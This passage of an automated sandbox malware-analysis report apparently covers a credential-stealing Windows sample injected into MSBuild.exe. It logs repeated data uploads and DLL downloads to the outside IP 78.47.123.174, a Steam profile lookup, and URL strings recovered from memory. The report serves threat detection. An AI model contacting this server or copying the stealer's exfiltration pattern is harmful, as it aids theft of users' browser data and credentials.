                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBGHCBAEGDHIDGCBAECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAFBAKECAEGCBFIEGDGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGCAAFBFBKFIDGDHJDBKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Content-Length: 6381Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGIIIDAKJDHJKFHIEBFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDHDGDHJEGHIDGDHCGCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAAAAFIIJDBGDGCGDAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIJECAEHJJJKJKFIDGCBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCAKKECAEGDGCBFIJEGHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHDGDHJEGHIDGDHCGCBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGCAAFBFBKFIDGDHJDBKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAFBAKECAEGCBFIEGDGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKECBFBAEBKJJJJKFCGCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Content-Length: 130769Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKJKEHIJECGCBFIJEGIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                    Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: unknownTCP traffic detected without corresponding DNS query: 78.47.123.174
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0040514C _EH_prolog,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,memcpy,lstrlenA,lstrlenA,memcpy,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,1_2_0040514C
                    Source: global trafficHTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Cache-Control: no-cache
                    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IIECFHDBAAECAAKFHDHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 78.47.123.174Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exeString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exeString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0A
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0C
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0N
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0X
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exeString found in binary or memory: http://ocsp.sectigo.com0
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                    Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
                    Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://www.digicert.com/CPS0
                    Source: MSBuild.exe, MSBuild.exe, 00000001.00000002.2060089144.000000006D09D000.00000002.00000001.01000000.0000000C.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                    Source: MSBuild.exe, 00000001.00000002.2048308496.000000001336C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2054500004.000000001930D000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.1.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                    Source: 76561199689717899[1].htm.1.drString found in binary or memory: https://78.47.123.174
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.47.123.174/
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.47.123.174/freebl3.dll
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.47.123.174/mozglue.dll
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.47.123.174/msvcp140.dll
                    Source: MSBuild.exe, 00000001.00000002.2045233748.00000000010A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.47.123.174/nss3.dll%
                    Source: MSBuild.exe, 00000001.00000002.2045233748.00000000010A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.47.123.174/nss3.dlla
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.47.123.174/softokn3.dlln
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000052E000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://78.47.123.174/sqls.dll
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.47.123.174/sqls.dll0$
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.47.123.174/sqls.dllT$:4y
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.47.123.174/vcruntime140.dll
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://78.47.123.174/vcruntime140.dllR
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://78.47.123.174EGDG
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000060B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://78.47.123.174FCGC
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://78.47.123.174JEGI
                    Source: AFBFHD.1.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exeString found in binary or memory: https://aka.ms/dotnet-core-applaunch?The
                    Source: SecuriteInfo.com.Win32.Malware-gen.198.6512.exeString found in binary or memory: https://aka.ms/dotnet-core-applaunch?missing_runtime=true&arch=&rid=falsetrue%pLuLdluldeEpP%c
                    Source: 76561199689717899[1].htm.1.drString found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000001066000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2045233748.000000000117E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2045233748.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, ECGIII.1.drString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000001066000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2045233748.000000000117E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2045233748.00000000010D9000.00000004.00000020.00020000.00000000.sdmp, ECGIII.1.drString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                    Source: AFBFHD.1.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: AFBFHD.1.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: AFBFHD.1.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.clo
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=Hpc3R3GOIT
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&amp;l=english&am
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&amp;l=engli
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&amp;
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&amp;l=en
                    Source: MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=7tll
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
                    Source: MSBuild.exe, 00000001.00000002.2045233748.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2042878342.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&amp;l=englis
